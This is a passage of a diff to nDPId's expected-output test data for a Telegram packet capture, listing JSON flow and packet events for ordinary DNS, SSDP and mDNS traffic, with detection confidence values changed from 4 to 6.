{"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":741,"source":"telegram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1588779629079,"flow_last_seen":1588779637572,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1588779637572,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":54595,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"telegram.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1588779637577,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779637577,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcg6JAADMRnoxbbAgBwKgBTQIVbfYASNOVL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJei6011ugWGAoAAAAAAAAAAAAA\/\/9XC83DTfQAAA=="} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1588779637582,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779637582,"pkt":"KDc3AG3IEBMx8Tl2CABFAABc3cdAADMRRGBbbAgIwKgBTQIRbfYASNNBL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJeEn+yq6ttUV0AAAAAAAAAAAAA\/\/9XC83DTfQAAA=="} 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1588779637681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779637681,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcuRdAADQRZBVbbAwDwKgBTQISbfYASKh2L+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJetvsboDHt5DsAAAAAAAAAAAAA\/\/9XC83DTfQAAA=="} @@ -193,7 +193,7 @@ 00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1588779637715,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1588779637715,"pkt":"KDc3AG3IEBMx8Tl2CABFAABcdalAADYRoYVbbBABwKgBTQIRbfYASCaUL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/8dyFcB12rJeYA3ERBA7Mh0AAAAAAAAAAAAA\/\/9XC83DTfQAAA=="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637830,"flow_last_seen":1588779637830,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1588779637830,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1588779637830,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1588779637830,"pkt":"AQBef\/\/6KDc3AG3ICABFAADKg14AAAERg9XAqAFN7\/\/\/+sufB2wAtsJkTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KVVNFUi1BR0VOVDogR29vZ2xlIENocm9tZS84My4wLjQxMDMuMzQgTWFjIE9TIFgNCg0K"} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637830,"flow_last_seen":1588779637830,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1588779637830,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"telegram.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779637830,"flow_last_seen":1588779637830,"flow_idle_time":200000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1588779637830,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"239.255.255.250","src_port":52127,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":749,"source":"telegram.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1588779638048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779638048,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEsZEAAEARo67AqAFNW2wICG32AhEAMJEzL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/9ywagRVgIMjg=="} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":750,"source":"telegram.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1588779638048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779638048,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEUI8AAEAR\/LfAqAFNW2wQAW32AhEAMO1PL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/cV+9m8\/VZmQ=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":751,"source":"telegram.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1588779638048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1588779638048,"pkt":"EBMx8Tl2KDc3AG3ICABFAABEfdIAAEAR03LAqAFNW2wMA232AhIAMLZjL+Sfp2xOtDPLzYKhu+piHv\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/DysMOlAk5VA=="} @@ -208,74 +208,74 @@ 00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1129,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1588779645375,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1588779645375,"pkt":"AQBeAAD7eCjKBfrMCABFAAFTiPpAAAERTLfAqAFF4AAA+xTpFOkBP9DmAACEAAAAAAEAAAADEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAABAAAAeAAvEXNvbm9zNzgyOENBMDVGQUNDEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MQX3Nwb3RpZnktY29ubmVjdARfdGNwBWxvY2FsAAAQgAEAABGUAB0LVkVSU0lPTj0xLjAQQ1BhdGg9L3Nwb3RpZnl6YxFzb25vczc4MjhDQTA1RkFDQxBfc3BvdGlmeS1jb25uZWN0BF90Y3AFbG9jYWwAACGAAQAAAHgAHwAAAAAFeBFzb25vczc4MjhDQTA1RkFDQwVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MFbG9jYWwAAAGAAQAAAHgABMCoAUU="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779645381,"flow_last_seen":1588779645381,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779645381,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1588779645381,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779645381,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACa3qgAAAERKNPAqAE17\/\/\/+sYKB2wAhlIKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779645381,"flow_last_seen":1588779645381,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779645381,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779645381,"flow_last_seen":1588779645381,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779645381,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":50698,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"telegram.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1588779647380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779647380,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACaUgcAAAERtXTAqAE17\/\/\/+sYKB2wAhlIKTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1220,"source":"telegram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1588779647380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":353,"pkt_l4_len":319,"thread_ts_msec":1588779647380,"pkt":"AQBeAAD7eCjKBfrMCABFAAFTigFAAAERS7DAqAFF4AAA+xTpFOkBP9DmAACEAAAAAAEAAAADEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAABAAAAeAAvEXNvbm9zNzgyOENBMDVGQUNDEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MQX3Nwb3RpZnktY29ubmVjdARfdGNwBWxvY2FsAAAQgAEAABGUAB0LVkVSU0lPTj0xLjAQQ1BhdGg9L3Nwb3RpZnl6YxFzb25vczc4MjhDQTA1RkFDQxBfc3BvdGlmeS1jb25uZWN0BF90Y3AFbG9jYWwAACGAAQAAAHgAHwAAAAAFeBFzb25vczc4MjhDQTA1RkFDQwVsb2NhbAARc29ub3M3ODI4Q0EwNUZBQ0MFbG9jYWwAAAGAAQAAAHgABMCoAUU="} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779648840,"flow_last_seen":1588779648840,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779648840,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1588779648840,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1588779648840,"pkt":"AQBef\/\/6wJrQLWJ0CABFAACaCVUAAAER\/ibAqAE17\/\/\/+txAB2wAhjvUTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779648840,"flow_last_seen":1588779648840,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779648840,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1281,"source":"telegram.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779648840,"flow_last_seen":1588779648840,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1588779648840,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"239.255.255.250","src_port":56384,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"telegram.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1588779650102,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1588779650102,"pkt":"EBMx8Tl2KDc3AG3ICABFAABM8zMAAEARoKnAqAFNVwvNw2326XwAOBQNt7NLZEiPyb9nJ25aFShQjjbK9tSAqF2RZJuCl4MIgiF4TeaDrkRovC99CpyADzRp"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650651,"flow_last_seen":1588779650651,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1588779650651,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1588779650651,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1588779650651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABD6GYAAP8RT6TAqAFNwKgBAeT3ADUAL99XO7EBAAABAAAAAAAACXRlbGVtZXRyeQdkcm9wYm94A2NvbQAAAQAB"} -00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650651,"flow_last_seen":1588779650651,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1588779650651,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1373,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650651,"flow_last_seen":1588779650651,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1588779650651,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650652,"flow_last_seen":1588779650652,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779650652,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1588779650652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1588779650652,"pkt":"EBMx8Tl2KDc3AG3ICABFAABHeaUAAP8RvmHAqAFNwKgBAcF9ADUAM+X9HKUBAAABAAAAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650652,"flow_last_seen":1588779650652,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779650652,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1374,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1588779650652,"flow_last_seen":1588779650652,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1588779650652,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1376,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1588779650666,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1588779650666,"pkt":"KDc3AG3IEBMx8Tl2CABFAABXLE1AADkRkarAqAEBwKgBTQA1wX0AQwAAHKWBgAABAAEAAAAABWU0NTE4BGRzY3gKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAAcABFx69t8="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1376,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779650666,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1376,"source":"telegram.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650652,"flow_last_seen":1588779650666,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1588779650666,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":49533,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e4518.dscx.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.122.246.223"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1378,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1588779650681,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":1588779650681,"pkt":"KDc3AG3IEBMx8Tl2CABFAABtxO5AADkR+PLAqAEBwKgBTQA15PcAWQAAO7GBgAABAAIAAAAACXRlbGVtZXRyeQdkcm9wYm94A2NvbQAAAQABwAwABQABAAAAcAAOCXRlbGVtZXRyeQF2wBbAMwABAAEAAAA8AASifRMJ"} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1378,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1588779650681,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.19.9"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1378,"source":"telegram.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1588779650651,"flow_last_seen":1588779650681,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1588779650681,"l3_proto":"ip4","src_ip":"192.168.1.77","dst_ip":"192.168.1.1","src_port":58615,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"telemetry.dropbox.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.19.9"}} 